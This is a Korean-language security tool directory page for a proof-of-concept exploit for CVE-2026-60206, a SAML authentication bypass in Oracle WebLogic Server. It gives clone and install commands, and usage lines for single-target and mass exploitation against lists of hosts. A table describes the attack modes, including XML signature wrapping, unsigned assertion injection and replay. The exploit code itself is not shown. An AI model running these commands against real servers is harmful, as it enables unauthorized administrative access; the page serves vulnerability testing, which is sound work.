Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
POC-CVE-2026-60206 — cve cve-2026-60206 weblogic saml exploit poc 취약점 oracle 스캐너 보안 | Kitploit
도구/GitHubGitHub/imbas007/poc-cve-2026-60206
Authentication & AuthorizationVulnerability ScannersVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubimbas007/poc-cve-2026-60206

POC-CVE-2026-60206

cve cve-2026-60206 weblogic saml exploit poc 취약점 oracle 스캐너 보안

저장소 보기
32941개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-60206 — Oracle WebLogic SAML 인증 우회

CVE CVSS

CVSS 9.9 — Oracle WebLogic Server Core의 SAML 인증 우회.
영향 대상: 12.2.1.4.0 14.1.1.0.0 14.1.2.0.0 15.1.1.0.0

⚠️ 승인된 보안 테스트 전용입니다.


설치

root@kitploit:~
git clone https://github.com/imbas007/CVE-2026-60206.git
cd CVE-2026-60206
pip install -r requirements.txt

사용법

단일 대상

root@kitploit:~
# Detect version + SAML endpoints
python3 CVE-2026-60206-exploit.py -t https://target:7002 --detect

# Full exploit (all attack vectors)
python3 CVE-2026-60206-exploit.py -t https://target:7002 --mode all -u weblogic

# Specific mode
python3 CVE-2026-60206-exploit.py -t https://target:7002 --mode combo -u admin -v

# With proxy
python3 CVE-2026-60206-exploit.py -t https://target:7002 --mode all --proxy http://127.0.0.1:8080 --no-verify

대량 스캔

root@kitploit:~
# Detect only
python3 CVE-2026-60206-exploit.py -l targets.txt -o results.json

# Detect + exploit (faster)
python3 CVE-2026-60206-exploit.py -l targets.txt --exploit --no-verify -T 30 -o results.json

# Single URL mass mode
python3 CVE-2026-60206-exploit.py -l https://target:7002 --exploit

대상 파일 (줄당 하나):

root@kitploit:~
192.168.1.100:7002
https://10.0.0.50
example.com

공격 모드 목록 보기

root@kitploit:~
python3 CVE-2026-60206-exploit.py --list-modes

공격 모드


프로젝트 구조

root@kitploit:~
CVE-2026-60206/
├── CVE-2026-60206-exploit.py   # Main script (single + mass)
├── mass_scan.py                # Mass scanner module
├── modules/
│   ├── samlib.py               # SAML manipulation (XSW, NameID, etc.)
│   ├── weblogic_client.py      # WebLogic HTTP client
│   └── logger.py               # Colored logging
├── requirements.txt
└── README.md

참고 자료

  • Oracle 2026년 7월 CPU
  • NVD: CVE-2026-60206
  • WebLogic SAML CVE-2018-2933 & CVE-2018-2998
도구 다운로드
모드설명
unsigned서명되지 않은 SAML 어서션 주입
xswXML 서명 래핑 (4가지 변형)
nameidNameID 조작 / 주석 주입
combo결합: XSW + 서명되지 않은 + NameID ⭐
audienceAudienceRestriction 우회
conditions시간/유효성 제한 우회
replaySAML 응답 재전송
all모두 실행